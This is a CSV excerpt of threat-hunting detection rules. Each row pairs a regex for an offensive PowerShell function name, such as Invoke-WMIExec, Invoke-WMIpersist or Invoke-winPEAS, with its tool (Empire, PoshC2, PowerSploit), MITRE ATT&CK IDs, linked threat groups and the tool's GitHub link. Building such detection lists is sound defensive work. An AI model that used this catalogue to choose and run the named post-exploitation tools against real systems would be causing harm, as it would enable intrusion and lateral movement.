"*Invoke-WebRev.ps1*",".{0,1000}Invoke\-WebRev\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49827"
"*Invoke-Whisker*",".{0,1000}Invoke\-Whisker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49828"
"*Invoke-WindowsEnum*",".{0,1000}Invoke\-WindowsEnum.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1082 - T1087 - T1057 - T1518 - T1016","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","49829"
"*Invoke-WindowsEnum.ps1*",".{0,1000}Invoke\-WindowsEnum\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49830"
"*Invoke-WindowsUpdateCheck*",".{0,1000}Invoke\-WindowsUpdateCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49831"
"*Invoke-WinEnum*",".{0,1000}Invoke\-WinEnum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-WinEnum.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49832"
"*Invoke-WinEnum.ps1*",".{0,1000}Invoke\-WinEnum\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49833"
"*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49834"
"*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49835"
"*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49836"
"*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49837"
"*Invoke-winPEAS.ps1*",".{0,1000}Invoke\-winPEAS\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49838"
"*invoke-winrmsession*",".{0,1000}invoke\-winrmsession.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49839"
"*Invoke-WireTap*",".{0,1000}Invoke\-WireTap.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49840"
"*Invoke-WireTap.ps1*",".{0,1000}Invoke\-WireTap\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49841"
"*Invoke-WlanProfilesCheck*",".{0,1000}Invoke\-WlanProfilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49842"
"*Invoke-WLMDR*",".{0,1000}Invoke\-WLMDR.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49843"
"*Invoke-WmicDriveBy.*",".{0,1000}Invoke\-WmicDriveBy\..{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1059.001 - T1021.002 - T1566.002","TA0002 - TA0009 - TA0043","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","49844"
"*Invoke-WmiCommand *",".{0,1000}Invoke\-WmiCommand\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49845"
"*Invoke-WmiCommand*",".{0,1000}Invoke\-WmiCommand.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","49846"
"*Invoke-WMICommand.ps1*",".{0,1000}Invoke\-WMICommand\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49847"
"*Invoke-WMIDebugger*",".{0,1000}Invoke\-WMIDebugger.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49848"
"*Invoke-WMIExec *",".{0,1000}Invoke\-WMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49849"
"*invoke-wmiexec *",".{0,1000}invoke\-wmiexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49850"
"*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49851"
"*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49852"
"*Invoke-WMIExec.ps1*",".{0,1000}Invoke\-WMIExec\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49853"
"*invoke-wmijspayload*",".{0,1000}invoke\-wmijspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49854"
"*Invoke-WMILM*",".{0,1000}Invoke\-WMILM.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49855"
"*Invoke-WMILM.json*",".{0,1000}Invoke\-WMILM\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49856"
"*Invoke-WMImplant*",".{0,1000}Invoke\-WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49857"
"*Invoke-WMIObfuscatedPSCommand*",".{0,1000}Invoke\-WMIObfuscatedPSCommand.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49858"
"*invoke-wmipayload*",".{0,1000}invoke\-wmipayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49859"
"*Invoke-WMIpersist*",".{0,1000}Invoke\-WMIpersist.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","N/A","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z","49860"
"*Invoke-WMIpersist.ps1*",".{0,1000}Invoke\-WMIpersist\.ps1.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","1","N/A","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z","49861"
"*Invoke-WMIRemoting *",".{0,1000}Invoke\-WMIRemoting\s.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","49862"
"*Invoke-WMIRemoting*",".{0,1000}Invoke\-WMIRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49863"
"*Invoke-WmiShadowCopy*",".{0,1000}Invoke\-WmiShadowCopy.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","49864"
